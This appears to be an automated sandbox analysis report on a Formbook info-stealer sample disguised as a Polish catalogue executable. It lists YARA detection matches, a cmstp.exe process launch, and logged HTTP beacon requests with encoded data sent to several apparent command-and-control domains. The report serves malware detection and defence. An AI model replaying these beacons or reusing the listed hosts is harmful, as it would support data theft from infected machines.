          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 10:48:29 GMTServer: Apache/2.4.10 (Debian)Content-Length: 285Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6c 6c 65 73 2d 61 62 67 65 64 65 63 6b 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 10:50:03 GMTContent-Type: text/html; charset=utf-8Content-Length: 2963Connection: closex-wix-request-id: 1636023003.449130355506120675Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjVnh5Kklh0tOjeXRNYui2I,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalt5/ToY82z3f1Iadd1mDV+wfoIgWdv1pdEYpwcIu9suB3fKEXQvQlSAkB/lstal9R17zYLyYyrK+fg616qIKE8c=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,2+8df7/86SpxIBpm+VHpf+i/fkkIKkD/fZgnosx7etd9pAiCxHhredE3m8SaSeMp,l7Ey5khejq81S7sxGe5NkxC4MYanLpg+PuBnb2R7HRGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9y9YchCOVZDNGbMpBN9NeuuXxLvkVaG5VQb5mydxWWiYfoPtReGns7o6BqA+77AHvGQ2Otd3B2C27oTTIAKJtQ==Vary: Accept-EncodingX-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f Data Ascii: <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo
          Source: cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmpString found in binary or memory: http://browsehappy.com/
          Source: nowy przyk#U0142adowy katalog.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: nowy przyk#U0142adowy katalog.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.worryterrible.space
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1Host: www.worryterrible.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.americanvisionvinyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1Host: www.iccsukltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.harada-insatsu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.affiliatemarketingproducts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.bezhantrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1Host: www.alles-abgedeckt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.leads-mania.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1Host: www.tankomixing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000002.362117708.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
